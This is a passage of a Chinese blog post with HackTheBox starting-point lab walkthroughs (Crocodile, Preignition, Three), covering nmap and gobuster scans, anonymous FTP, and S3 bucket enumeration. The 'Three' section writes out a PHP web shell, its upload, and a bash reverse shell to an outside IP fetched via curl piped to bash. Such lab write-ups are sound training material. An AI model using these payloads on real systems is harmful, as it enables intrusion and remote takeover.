<p><img src="/.com//HackTheBox%E4%B8%8A%E5%88%86%E9%94%A6%E5%9B%8A%5C4.png"></p>
<p>使用select语句查看config表中的内容-我们成功发现了flag及其对应值：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from config;</span><br></pre></td></tr></table></figure>

<h4 id="mysql语句需要学"><a href="#mysql语句需要学" class="headerlink" title="mysql语句需要学"></a>mysql语句需要学</h4><p>mysql数据库服务</p>
<h3 id="Crocodile"><a href="#Crocodile" class="headerlink" title="Crocodile"></a>Crocodile</h3><p>在扫描时,Nmap扫描开关使用默认脚本是什么?</p>
<p>-sC</p>
<p>使用FTP客户端连接到FTP服务器后，当提示匿名登录时，我们提供什么用户名?</p>
<p>我们先使用以下命令连接目标机的ftp服务：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ftp 10.129.162.197</span><br></pre></td></tr></table></figure>

<p>接着输入：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">anonymous //匿名登录</span><br></pre></td></tr></table></figure>



<p>Gobuster可以使用什么开关来指定我们正在寻找特定的文件类型?</p>
<p>-x</p>
<p>我们可以使用目录蛮力识别哪个PHP文件，从而提供向web服务进行身份验证的机会?</p>
<p>login.php</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gobuster dir -u http://10.129.162.197 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt  -x .php</span><br></pre></td></tr></table></figure>

<p><img src="/.com//HackTheBox%E4%B8%8A%E5%88%86%E9%94%A6%E5%9B%8A%5C5.png"></p>
<p><img src="/.com//HackTheBox%E4%B8%8A%E5%88%86%E9%94%A6%E5%9B%8A%5C6.png"></p>
<p><img src="/.com//HackTheBox%E4%B8%8A%E5%88%86%E9%94%A6%E5%9B%8A%5C7.png"></p>
<p>在前文已经通过ftp下载了两个文件并查看了内容，发现疑似的用户名和密码；<br>同时我们还通过使用gobuster扫描了目标站点目录，发现了一个疑似登陆页面login.php；<br>结合以上信息，我们可以使用已获取的账号admin以及密码值 尝试通过login.php页面进行登录：</p>
<p><img src="/.com//HackTheBox%E4%B8%8A%E5%88%86%E9%94%A6%E5%9B%8A%5C8.png"></p>
<h3 id="Responder"><a href="#Responder" class="headerlink" title="Responder"></a>Responder</h3><p>URL参数的名称是什么,用于加载不同语言版本的网页?</p>
<h1 id="Preignition"><a href="#Preignition" class="headerlink" title="Preignition"></a>Preignition</h1><p>直接爆破</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">gobuster dir -w /usr/share/dirb/wordlists/common.txt -u 10.129.9.218</span><br><span class="line"></span><br><span class="line">dir代表目录扫描</span><br><span class="line">-w 代表词表</span><br><span class="line">-u 代表网址</span><br></pre></td></tr></table></figure>

<p><img src="/.com//HackTheBox%E4%B8%8A%E5%88%86%E9%94%A6%E5%9B%8A%5C9.png">s</p>
<p><strong>在名为&#x2F;admin.php</strong>的目录中找到 Gobuster</p>
<h1 id="Mongod"><a href="#Mongod" class="headerlink" title="Mongod"></a>Mongod</h1><p><a target="_blank" rel="noopener" href="https://www.rffuste.com/2022/10/10/htb-mongod/">https://www.rffuste.com/2022/10/10/htb-mongod/</a></p>
<h1 id="Three"><a href="#Three" class="headerlink" title="Three"></a>Three</h1><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">nmap --min-rate 10000 -p- 靶机ip</span><br><span class="line">nmap -sV -sT -O -p22,80 靶机ip</span><br></pre></td></tr></table></figure>

<p>3、hosts配置</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo &#x27;靶机ip thetoppers.htb&#x27; &gt;&gt; /etc/hosts</span><br></pre></td></tr></table></figure>

<p>4、子域名爆破</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gobuster vhost -w /usr/share/wordlists/subnames.txt -u http://thetoppers.htb</span><br></pre></td></tr></table></figure>

<p>注意选择自己的爆破词典，这里可能爆破不出，直接给出是s3.thetoppers.htb</p>
<p>5、hosts再配置</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo &#x27;靶机ip s3.thetoppers.htb&#x27; &gt;&gt; /etc/hosts</span><br></pre></td></tr></table></figure>

<p>6、网页查看子域名</p>
<p>或者shell执行：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl s3.thetoppers.htb</span><br></pre></td></tr></table></figure>

<p>7、awscli安装</p>
<p>通过爆破的子域名，我们知道是使用的Amazon的s3服务，需要安装命令行工具</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">apt install -y awscli -y</span><br></pre></td></tr></table></figure>

<p>8、awscli配置</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">aws configure</span><br></pre></td></tr></table></figure>

<p>9、列出所有s3的桶</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">aws --endpoint=http://s3.thetoppers.htb s3 ls </span><br></pre></td></tr></table></figure>

<p>10、列出该s3下的目录及对象</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb</span><br></pre></td></tr></table></figure>

<p>11、编写php 代码</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo &#x27;&lt;?php system($_GET[&quot;cmd&quot;]); ?&gt;&#x27; &gt; shell.php</span><br></pre></td></tr></table></figure>

<p>12、使用cp命令拷贝到s3的桶里</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb</span><br></pre></td></tr></table></figure>

<p>13、查看上传结果</p>
<p>使用浏览器打开</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://thetoppers.htb/shell.php?cmd=ls</span><br></pre></td></tr></table></figure>

<p>14、配置反弹shell</p>
<p>先查询本机拨通的v-p&#x2F;n的IP</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ifconfig tun0</span><br></pre></td></tr></table></figure>

<p>15、编写shell脚本</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">vim shell.sh</span><br><span class="line">#!/bin/bash</span><br><span class="line">bash-i &gt;&amp; /dev/tcp/10.10.16.60/1337 0&gt;&amp;1 #上一步查询的ip</span><br></pre></td></tr></table></figure>

<p>16、配置nc监听</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -nvlp 1337</span><br></pre></td></tr></table></figure>

<p>17、配置简易web</p>
<p>新开启shell终端，切换到shell.sh所在路径</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 -m http.server 8090</span><br></pre></td></tr></table></figure>

<p>18、执行脚本</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://thetoppers.htb/shell.php?cmd=curl%2010.10.16.60:8090/shell.sh%20|%20bash</span><br></pre></td></tr></table></figure>

<p>19、拿到shell</p>

      
       <hr><span style="font-style: italic;color: gray;"> 转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论，也可以邮件至 jaytp@qq.com </span>
    </div>
</article>


<p>
    <a  class="dashang" onclick="dashangToggle()">💰</a>
</p>






    




    </div>
    <div class="copyright">
        <p class="footer-entry">
    ©2016-2023 answer77
</p>
<p class="footer-entry">Built with <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/yelog/hexo-theme-3-hexo" target="_blank">3-hexo</a> theme</p>

    </div>
    <div class="full-toc">
        <button class="full" data-title="切换全屏 快捷键 s"><span class="min "></span></button>
<a class="" id="rocket" ></a>

    </div>
</div>

<div class="hide_box" onclick="dashangToggle()"></div>
<div class="shang_box">
    <a class="shang_close"  onclick="dashangToggle()">×</a>
    <div class="shang_tit">
        <p>Help us with donation</p>
    </div>
    <div class="shang_payimg">
        <div class="pay_img">
            <img src="/img/alipay.jpg" class="alipay" title="扫码支持">
            <img src="/img/weixin.jpg" class="weixin" title="扫码支持">
        </div>
    </div>
    <div class="shang_payselect">
        <span><label><input type="radio" name="pay" checked value="alipay">alipay</label></span><span><label><input type="radio" name="pay" value="weixin">weixin</label></span>
    </div>
</div>


</body>
<script src="/js/jquery.pjax.js?v=1.1.0" ></script>

<script src="/js/script.js?v=1.1.0" ></script>
<script>
    var img_resize = 'default';
    function initArticle() {
        /*渲染对应的表格样式*/
        
            $("#post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        
        $("input[name=pay]").on("click", function () {
            if($("input[name=pay]:checked").val()=="weixin"){
                $(".shang_box .shang_payimg .pay_img").addClass("weixin_img");
            } else {
                $(".shang_box .shang_payimg .pay_img").removeClass("weixin_img");
            }
        })
        

        /*高亮代码块行号*/
        

        /*访问数量*/
        
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));

        
        
    }

    /*打赏页面隐藏与展示*/
    
    function dashangToggle() {
        $(".shang_box").fadeToggle();
        $(".hide_box").fadeToggle();
    }
    

</script>

<!--加入行号的高亮代码块样式-->

<!--自定义样式设置-->
<style>
    
    
    .nav {
        width: 672px;
    }
    .nav.fullscreen {
        margin-left: -672px;
    }
    .nav-left {
        width: 250px;
    }
    
    
    @media screen and (max-width: 1468px) {
        .nav {
            width: 572px;
        }
        .nav.fullscreen {
            margin-left: -572px;
        }
        .nav-left {
            width: 180px;
        }
    }
    
    
    @media screen and (max-width: 1024px) {
        .nav {
            width: 572px;
            margin-left: -572px
        }
        .nav.fullscreen {
            margin-left: 0;
        }
    }
    
    @media screen and (max-width: 426px) {
        .nav {
            width: 100%;
        }
        .nav-left {
            width: 100%;
        }
    }
    
    
    .nav-right .title-list nav a .post-title, .nav-right .title-list #local-search-result a .post-title {
        color: #383636;
    }
    
    
    .nav-right .title-list nav a .post-date, .nav-right .title-list #local-search-result a .post-date {
        color: #5e5e5f;
    }
    
    
    .nav-right nav a.hover, #local-search-result a.hover{
        background-color: #e2e0e0;
    }
    
    

    /*列表样式*/
    

    /* 背景图样式 */
    
    #post {
        background: url(/img/3.png);
    }
    
    
    #post .index {
        background: url(/img/3.png);
    }
    


    /*引用块样式*/
    

    /*文章列表背景图*/
    
    .nav-right:before {
        content: ' ';
        display: block;
        position: absolute;
        left: 0;
        top: 0;
        width: 100%;
        height: 100%;
        opacity: 0.5;
        background: url("/img/2.png");
        background-repeat: no-repeat;
        background-position: 50% 0;
        -ms-background-size: cover;
        -o-background-size: cover;
        -moz-background-size: cover;
        -webkit-background-size: cover;
        background-size: cover;
    }
    

    
</style>







</html>
